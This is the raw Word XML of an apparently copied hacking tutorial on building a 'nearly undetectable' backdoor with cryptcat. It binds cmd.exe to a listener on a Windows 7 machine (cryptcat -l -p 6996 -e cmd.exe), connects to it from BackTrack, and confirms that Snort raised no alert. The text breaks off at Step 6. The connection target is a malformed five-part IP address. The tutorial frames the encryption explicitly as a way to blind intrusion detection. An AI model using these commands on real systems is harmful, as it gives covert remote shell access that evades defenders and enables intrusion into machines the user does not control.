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5E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="003706EE">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9E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Create a Nearly Undetectable Backdoor with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:bookmarkEnd w:id="0"/>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Awhile back, I demonstrated one of my favorite little tools, </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="009E25E1">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>netcat</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, which enables us to create a connection between any two machines and transfer files or spawn a command shell for "owning" the system. Despite the beauty and elegance of this little tool, it has one major drawback—the transfers between the computers can be detected by security devices such as firewalls and an intrusion detection system (IDS).</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In this tutorial, I'll introduce you to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netcat's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> popular cousin, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (she's actually much cuter and more exotic than the plain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w: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xml:space="preserve"> enables us to communicate between two systems and encrypts the communication between them with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>twofish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, one of many excellent encryption algorithms from Bruce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Schneier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> et al.</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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Twofish's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encryption is on par with AES encryption, making it nearly bulletproof. In this way, the IDS can't detect the malicious behavior taking place even when </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> traveling across normal HTTP ports like 80 and 443.</w:t>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t xml:space="preserve">Step 1 Download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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You can download and install </w:t>
      </w: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xml:space="preserve"> on a Windows system using </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="009E25E1">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>this link</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>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t>Step 2 Open a Listener on the Windows System</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We can open a </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="009E25E1">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>listener</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on any system with a similar syntax as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. In this case, we're opening a listener on a Windows 7 system on port 6996 and spawning a command shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l -p 6996 -e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5843016" cy="868680"/>
            <wp:effectExtent l="0" t="0" r="5715" b="7620"/>
            <wp:docPr id="7" name="Picture 7" descr="https://img.wonderhowto.com/img/45/77/63519077742835/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptca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45/77/63519077742835/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptcat.w1456.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3016" cy="868680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> means "open a listener"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6996 means "place the listener on port 6996"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-e cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> means "execute a command shell to the connection"</w:t>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lastRenderedPageBreak/>
        <w:t>Step 3 Open Snort or Other IDS</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Now, let's start up an IDS like </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="009E25E1">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Snort</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on another system that will connect to the Windows system to see whether the encryption is able to "blind" the IDS, leaving our backdoor invisible to such security devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5791200" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="https://img.wonderhowto.com/img/60/17/63519197651017/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptca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0/17/63519197651017/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptcat.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1905000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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t xml:space="preserve">Step 4 Connect to the Windows System with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Since </w:t>
      </w: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xml:space="preserve"> is installed by default on </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="009E25E1">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>BackTrack</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, we don't have to download and install it. In addition, it's in a </w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, so we can access it from any directory.</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Now, we can connect to the Windows 7 system with </w:t>
      </w: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xml:space="preserve"> from our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BackTrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> system and see whether we can complete an encrypted backdoor connection that is nearly impossible to detect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cryptcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.4.182.248 6996</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5753100" cy="1819275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="5" name="Picture 5" descr="https://img.wonderhowto.com/img/85/52/63519442954880/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptca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85/52/63519442954880/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptcat.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819275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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As you can see, we connected to the Windows 7 system and received a command shell from the Win 7 system! This gives us significant control over that system, but not total control as the command shell has limited capability.</w:t>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lastRenderedPageBreak/>
        <w:t>Step 5 Check Your Snort Logs and Alert</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This type of attack (passing a command shell across the wire) is easily detected with Snort or other IDS's when the connection is unencrypted. </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="009E25E1">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Snort rules</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> will alert the sysadmin that a cmd.exe shell has traversed their network connection, and they are likely to do something then to keep you using that command shell. With the encrypted connection available with </w:t>
      </w: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this connection should be nearly undetectable.</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Let's go back now and check your logs and alerts in Snort. If we were successful in evading the IDS, you should NOT see any alerts regarding command shell moving across the wire. We can check our logs by going to </w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/snort/alerts</w:t>
      </w:r>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and see whether any alerts have been triggered by our connection to the Windows machine (normally, we should find an alert).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kwrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/snort/alerts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E25E1" w:rsidRPr="009E25E1" w:rsidRDefault="009E25E1" w:rsidP="009E25E1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6915150" cy="3790950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="https://img.wonderhowto.com/img/73/13/63519445275587/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptca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73/13/63519445275587/0/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptcat.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15150" cy="3790950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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As you can see, we were successful. We were able to connect to the Windows system without alerting any of the security systems!</w:t>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t xml:space="preserve">Step 6 Send </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E25E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
